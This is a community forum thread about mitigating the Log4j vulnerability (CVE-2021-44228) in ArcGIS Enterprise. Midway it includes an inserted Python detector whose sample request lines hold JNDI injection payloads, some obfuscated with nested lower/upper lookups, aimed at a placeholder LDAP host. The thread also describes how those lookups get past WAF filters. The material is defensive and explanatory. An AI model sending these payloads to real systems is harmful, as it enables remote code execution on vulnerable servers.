ArcGIS Enterprise Log4j Vulnerability (CVE-2021-44228) Patch or Mitigation?

12-11-2021 09:13 AM
Carl_Flint
New Contributor III

Good afternoon, are there any patches in the works or potential mitigation steps for the latest Java Log4j vulnerability (CVE-2021-44228)? I know that GeoEvent Server uses Log4j and can assume some other Enterprise servers or Portal potentially do as well. Any help would be appreciated in resolving this zero-day.

Thanks,

Carl Flint, GISP
162 Replies
RandallWilliams
Esri Regular Contributor

Restating under my Esri profile for clarity:

Please continue to follow the advisory we've published. There have been and will continue to be updates as the day progresses.

We have spent considerable time performing internal security testing, and there is no evidence of any proven exploit vectors for remote code execution (RCE) in any version of a base ArcGIS Enterprise deployment (including ArcGIS Server, Portal for ArcGIS, and ArcGIS Data Store). This means that while several components of ArcGIS Enterprise incorporate different versions of Log4J across all versions of ArcGIS Enterprise, there are no known ways to exploit this vulnerability. 10.8.x is mitigated: ArcGIS Enterprise versions 10.8 and higher use newer versions of the Java Runtime Environments (JRE) that do not allow for execution of remotely loaded code. On these versions of ArcGIS Enterprise, even hypothetical future remote exploit vectors are presumed to be mitigated.

Please continue to refer to the advisory we've posted as the source of truth from Esri regarding this evolving issue. 

JohnBrockwell
Occasional Contributor III

Getting Off Topic. Please keep it to:
Log4j Vulnerability (CVE-2021-44228)

rshihab
New Contributor III

Hi John

Does the WAF apply to ArcGIS Enterprise hosted locally, or just to Azure? Are the attached settings below enough?


Ramla Shihab
JohnBrockwell
Occasional Contributor III

I am not taking that remediation action(s). I am getting all my environments to 10.8.1. I was in pretty good shape to begin with.

The one piece of advice I would give is don't fret about an outage. Accept a short term outage to avoid a long term one.

RandallWilliams
Esri Regular Contributor

Blocking strings like ${jndi will mitigate this issue.

ChristophK
New Contributor II

WAF filters like that can be easily circumvented with other nested filters, like lower/uppercase functions (lower:j, lower:n ...)

It won't allow me to post an example, but I hope the idea is clear.

berniejconnors
Occasional Contributor III

You can type your example and then do a screen capture and include the image in your post instead of the text.

ChristophK
New Contributor II

Thanks @berniejconnors , here's a screenshot of what I mean. I found these two examples in a Twitter post by user @ entropyqueen_.


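As an added illustration, not part of this thread and not Esri code, of the two points above (a WAF rule on the literal text ${jndi, and why nested lower/upper lookups slip past it): Log4j 2 resolves ${name:arg} lookups recursively before a message is written, so a detector has to do the same resolution before it compares. The script below models only the lookups relevant to the circumvention (lower, upper, and the ${x:-fallback} default form); that simplification, the sample request lines and the placeholder host are assumptions made for the example.

```python
import re

# Log4j 2 resolves "${name:arg}" lookups inside a log message before it is
# written, and does so recursively, so a naive WAF rule on the literal text
# "${jndi" misses a payload whose "jndi" is assembled from nested lookups such
# as ${lower:J} (the circumvention described in the thread).  This detector
# approximates that resolution step so the check sees what Log4j would see.
# Assumption: only the lookups relevant to obfuscation are modelled (lower,
# upper, and the "${x:-fallback}" form); anything else is marked and left in
# place so the substitution loop cannot recurse forever.
LOOKUP = re.compile(r"\$\{([^{}]*)\}")


def _resolve_one(inner: str) -> str:
    """Resolve one innermost lookup body (the text between ${ and })."""
    name, sep, arg = inner.partition(":")
    if sep:
        key = name.lower()
        if key == "lower":
            return arg.lower()
        if key == "upper":
            return arg.upper()
        # ${something:-fallback}: when a lookup cannot be satisfied Log4j
        # substitutes the fallback; every unmodelled lookup is treated as failing.
        if ":-" in inner:
            return inner.rsplit(":-", 1)[1]
    # Unresolvable lookup: keep its text for inspection but drop the ${ }
    # delimiters so the loop terminates.
    return "\u00ab" + inner + "\u00bb"


def normalize_lookups(text: str, max_rounds: int = 32) -> str:
    """Repeatedly substitute innermost lookups until the text stops changing."""
    for _ in range(max_rounds):
        resolved = LOOKUP.sub(lambda m: _resolve_one(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def naive_match(text: str) -> bool:
    """The literal-substring rule discussed in the thread."""
    return "${jndi" in text.lower()


def jndi_lookup_detected(text: str) -> bool:
    """True when the text, once lookups are resolved, contains a JNDI lookup."""
    return "jndi:" in normalize_lookups(text).lower()


# Constructed sample request lines (placeholder host, not a real target).
SAMPLES = [
    "GET /portal/home/ HTTP/1.1 User-Agent: Mozilla/5.0",
    "GET /server/rest/info?f=${date:yyyy} HTTP/1.1",
    "GET / HTTP/1.1 User-Agent: ${jndi:ldap://placeholder.invalid/a}",
    "GET / HTTP/1.1 User-Agent: ${${lower:j}ndi:ldap://placeholder.invalid/a}",
    "GET / HTTP/1.1 User-Agent: ${${upper:j}${::-n}di:ldap://placeholder.invalid/a}",
]


def scan(lines=SAMPLES):
    """Return (line, naive_result, resolved_result) for each line."""
    return [(line, naive_match(line), jndi_lookup_detected(line)) for line in lines]


if __name__ == "__main__":
    for line, naive, resolved in scan():
        print(f"naive={naive!s:5} resolved={resolved!s:5}  {line}")
```

Running it shows the literal rule catching only the plain form while the resolving check flags all three lookup variants and leaves the benign ${date:yyyy} line alone; the same normalization idea is what makes a WAF rule worth more than a substring match, which is the point of the defense-in-depth reply that follows.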
RandallWilliams
Esri Regular Contributor

Yes, but that doesn't change the fact that a WAF is a crucial part of any organization's defense in depth posture. No, a WAF won't eliminate ANY given risk, but security is about risk reduction with an eye toward risk elimination. 

SebastienPelletier
Occasional Contributor

Question, when we set the variable LOG4J_FORMAT_MSG_NO_LOOKUPS, do we need to restart the server or ArcGIS Server?
